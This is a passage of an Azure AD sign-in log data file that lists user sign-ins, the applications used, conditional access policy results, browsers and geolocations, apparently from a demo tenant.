'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",52a6664f-09a1-41b6-959f-775d438c1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,52a6664f-09a1-41b6-959f-775d438c1200,SigninLogs,Sucess,33.7984581,-84.38828278
+1278,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:21.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,81350f23-e8cf-48b0-9cf2-5229652c4a82,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",3b0e5c51-5aba-4adb-89c0-6eab10a41500,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3b0e5c51-5aba-4adb-89c0-6eab10a41500,SigninLogs,Sucess,50.6406517,5.572050095
+1279,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:14.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,16cc012e-731f-490e-8819-bb820c9e7ff7,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",9303d935-cf24-489a-bd00-a11cc6501500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,9303d935-cf24-489a-bd00-a11cc6501500,SigninLogs,Sucess,41.90428925,-85.99833679
+1280,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:16.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bfce3d6a-0f4e-49f5-ac7a-a1f8ab9f491b,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",9303d935-cf24-489a-bd00-a11c0b511500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,9303d935-cf24-489a-bd00-a11c0b511500,SigninLogs,Sucess,41.90428925,-85.99833679
+1281,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:17.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc11d36e-e69c-410c-963d-af3838f72823,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d1f5cda6-13d0-4741-81eb-e384a0281400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d1f5cda6-13d0-4741-81eb-e384a0281400,SigninLogs,Sucess,41.90428925,-85.99833679
+1282,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:58.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,26b91dc5-1547-4e35-ab0e-d553a668b2b5,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6849a433-22b7-4af4-99c8-beeeafd81600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6849a433-22b7-4af4-99c8-beeeafd81600,SigninLogs,Sucess,36.6404686,-78.26995087
+1283,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:03.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5ba30877-fe5d-4dc4-8c19-e13fae641600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5ba30877-fe5d-4dc4-8c19-e13fae641600,SigninLogs,Sucess,33.0175209,35.44601059
+1284,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:45.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b1975a30-ad49-4c41-838b-03fcc4b8ce20,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbc0f99c-7bef-40f5-9b26-c77df96d1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,cbc0f99c-7bef-40f5-9b26-c77df96d1700,SigninLogs,Sucess,33.7984581,-84.38828278
+1285,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:09.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6c09bccb-a409-476a-8d75-ed3359fee41b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 